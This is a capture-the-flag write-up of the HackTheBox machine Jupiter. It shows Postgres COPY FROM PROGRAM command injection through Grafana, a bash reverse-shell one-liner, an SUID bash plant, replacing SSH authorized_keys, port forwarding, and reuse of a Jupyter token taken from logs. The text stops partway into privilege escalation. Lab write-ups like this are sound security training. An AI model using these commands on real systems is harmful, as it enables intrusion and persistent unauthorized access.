HackTheBox : Jupiter

7 min readJun 25, 2023

Intro: This is my new writeup on HackTheBox ‘Machine’ Jupiter. It is little difficult free machine. Here you will find Command Injection in ‘Postgresql’ and later you have to do Pivoting and also lateral movement. So let’s dive into the machine.

Nmap Scan :

As usual we start with a simple Nmap Scan. And there are 2 ports are open as usual : 22(ssh) , 80(http).

Web Enumeration :

There is domain name called ‘jupiter.htb’. I added this in my host file and explore the Website.

It is a simple Website and I found nothing special in this page. I also tried ‘gobuster’ and ‘nikto’ scan but they are not so usable.

So in this situation I start a subdomain enumeration with ‘gobuster’ and I found a subdomain called ‘kiosk.jupiter.htb’.

So I add this in my host file and visit the website.

Web Exploitation :

This is a website where you found details information about our Solar System Planets. And it is ‘GRAFANA’ UI page. In the page I found nothing Interesting. So I intercept all the request in my ‘BurpSuite’. And I found a interesting POST request on ‘/api/ds/query’.

So I send the request in my burp ‘Repeater’. The request is like this.

In the bottom of the request file I found some ‘json’ content; mentioning about Postgresql. [“type” : “postgres”]. I found some postgres payload here. This is like Command Injection [CVE-2019–9193]. So I try all payload in that list.

Tip : 1> DROP TABLE IF EXISTS cmd_exec;
2> CREATE TABLE cmd_exec(cmd_output text)
3> COPY cmd_exec FROM PROGRAM ‘id’;

Note : I replace the ‘id’ command with a bash reverse_shell. Because this not showing us ‘id’.

Tip : bash -c \“bash -i >& /dev/tcp/<tun0_ip>/<port> 0>&1\”

After that I set my listener and get a Reverse_Shell as ‘postgres’ user.

Then I upgrade the Shell because that Shell is not properly usable. Follow the command below.

Tip : 1> python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
2> Ctrl-Z
3> stty raw -echo; fg
4> export TERM=xterm (Press Enter)

postgres → juno :

Then I go to home folder because this user contains no user_flag. There are 2 users ‘juno’ and ‘jovian’. I try find all files that belogs to ‘juno’ user.

Tip : find / -user juno 2>/dev/null

I found some Interesting File. There are lot of files but I found the following file interesting.

I open that file in a text editor and change some command.

I change 1st process path,args and 2nd process path,args. These are following.

Tip : - path: /usr/bin/cp
args: /bin/bash /tmp/bash [1st Process]
Tip : — path: /usr/bin/chmod
args: u+s /tmp/bash [2nd Process]

Basically we are copying the ‘bash’ binary and giving it ‘SUID’ bit permission. So it will make a binary file named ‘bash’ regarding to ‘juno’ user.

After sometime we get a binary file with ‘SUID’ permission.

Let’s run that Binary.

And at last we get a shell as juno. But in his home folder we have no permission to see his ‘user.txt’ file. Permission Denied. :)

But there is ‘.ssh’ directory. We hop over that and find an authorized_keys.

So I remove that key file and replace with my own ‘id_rsa.pub’ key and rename it as before (authorized_keys). Follow the process below.

Making privet and public id_rsa keys with ‘ssh-keygen’.

Sending the Public Key to the victim’s Machine.

Tip : mv id_rsa.pub authorized_keys
Tip : chmod 600 id_rsa (in your privet key)

Then I logged in using my own privet id_rsa to ‘juno’s account.

Here I get the first “user_flag” .

Ohh!! At last. So long process. Ya!!!! :) :)

Pivoting : Juno → jovian

In user shell I type ‘netstat -nptl’ command to list all active port running internally in that Machine.

I found ‘127.0.0.1:8888’ interesting. So I try forward that Port in my local Machine using ‘ssh local port’ forwarding method.

Tip : ssh -i id_rsa -L 8888:127.0.0.1:8888 juno@<victim_ip>

This command will forward that port(8888) in my machine. And I can easily access that. :)

I got the above page. But again it is asking for valid ‘password or token’. So let’s find it. Actually it is in our user shell. In the ‘/opt/solar-flares/logs’.

There are so many log files but what is the right file. Let’s use bash trick to find this.

Tip : cat * | grep “token”

There are so many Tokens. I use the last one. Because it is the last token of the user who logged in. Your token may be different.

I use the highlighted token in that token field and I logged in.

Here I go to the second_one ‘flares.ipynb’.

Here I go to File → New Notebook → Python 3 (ipykernel).

In that python console I put a Python3 Reverse_Shell Command. I set my ‘Netcat’ listener and click on ‘Run’ option. Immediately I get a shell as ‘jovian’.

Privilege Escalation :

So it’s time for some PrivEsc. I type ‘sudo -l’ command and it prompted ne like below.

So it is executing a binary file.

I use ‘strings’ command on that binary a I found it is using a json file ‘/tmp/config.json’.

So I copy that file in tmp folder for testing.

The file content is like this below.

It is using ‘tlesources’ to get some URL content. So it will be what if we change that content to ‘/root/root.txt’ which can get me the root flag without Root Permission. So let’s try.